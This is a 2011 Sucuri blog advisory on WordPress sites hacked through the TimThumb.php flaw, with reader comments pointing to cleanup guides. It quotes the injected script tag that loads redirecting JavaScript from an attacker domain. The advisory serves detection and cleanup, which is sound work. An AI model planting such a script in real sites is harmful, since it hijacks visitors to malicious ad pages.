• Skip to primary navigation
  • Skip to content
  • Skip to primary sidebar
  • Skip to footer

Sucuri Blog

Website Security News

  • Products
    • Website Security Platform
    • Website Firewall (WAF)
    • Enterprise Website Security
    • Multisite Solutions
  • Features
    • Detection
    • Protection
    • Performance
    • Response
    • Backups
  • Partners
    • Agency Solutions
    • Partners
    • Referral Program
    • Ecommerce
  • Resources
    • Guides
    • Webinars
    • Infographics
    • SiteCheck
    • Reports
    • Email Courses
  • Immediate Help
  • Login

WordPress Sites Hacked with Superpuperdomain dot com (Attacking Timthumb.php)

August 11, 2011David Dede

FacebookTwitterSubscribe

We are seeing a large number of WordPress sites compromised with a malicious JavaScript loading from superpuperdomain.com/count.php. That JavaScript redirects visitors that were going to the WordPress site to fake search engines.

This is what shows up at the bottom of the hacked sites:

<script language="javascript" SRC="http://superpuperdomain&#46com/count&#46php?ref=http%3A%2F%2Fsite.com%2Fdif%2F"></script>

This script basically loads a bunch of encoded JavaScript that redirects the user to www.upliftsearch.com, www.filmannex.com and other “search engines” full of ads.

How are the sites getting compromised?

On the sites we’ve analyzed, they were hacked through the timthumb.php vulnerability that was published a few days ago. The attackers are also creating a bunch of backdoors to maintain their access to the hacked sites.

If you are using the timthumb.php scripts, remove or update it now!.

Keeping yourself secure

This is not a vulnerability in WordPress, it is a vulnerability found in various WordPress themes that include TimThumb! You have to make sure that you are using an updated theme, and from a legitimate source. Otherwise your theme may contain this vulnerability, or others (even backdoors), that may not be given the proper attention by their theme authors.

If you’re not sure, you can do a free scan of your site using Sucuri SiteCheck

FacebookTwitterSubscribe

Categories: Website Malware Infections, WordPress SecurityTags: Malware Updates

About David Dede

David is a Security Researcher at Sucuri. He spends most of his time dissecting vulnerabilities and security issues. You won't find him on Twitter because he is paranoid about privacy.

Reader Interactions

Comments

  1. Ed

    August 13, 2011

    what do you suggest if the site has already been hacked?

    • Asyuti47

      August 17, 2011

      Hi,
      I was hacked the the three steps in the comment by sharklauncher on this article saved me and fixed the problem.
      https://blog.sucuri.net/2011/08/update-to-the-superpuperdomain2-com-malware.html

      Hope you find it useful as well.

  2. Pixel2Pixel Design

    August 18, 2011

    Refer this article it is a good one to remove this virus http://www.pixel2pixeldesign.com/phpremoteview-hack-superpuperdomaincom-remove/

Primary Sidebar

Socialize With Sucuri

We're actively engaged across multiple platforms. Follow us and let's connect!

  • Facebook
  • Twitter
  • LinkedIn
  • YouTube
  • Instagram
  • RSS Feed

Join Over 20,000 Subscribers!

Sucuri Sidebar Malware Removal to Signup Page

Footer

Products

  • Website Firewall
  • Website AntiVirus
  • Website Backups
  • WordPress Security
  • Enterprise Services

Solutions

  • DDos Protection
  • Malware Detection
  • Malware Removal
  • Malware Prevention
  • Blacklist Removal

Support

  • Blog
  • Knowledge Base
  • SiteCheck
  • Research Labs
  • FAQ

Company

  • About
  • Media
  • Events
  • Employment
  • Contact
  • Testimonials
  • Facebook
  • Twitter
  • LinkedIn
  • Instagram

Customer Login

Sucuri Home

  • Terms of Use
  • Privacy Policy
  • Frequently Asked Questions

© 2023 Sucuri Inc. All rights reserved

Sucuri Cookie Policy
See our policy>>

Our website uses cookies, which help us to improve our site and enables us to deliver the best possible service and customer experience.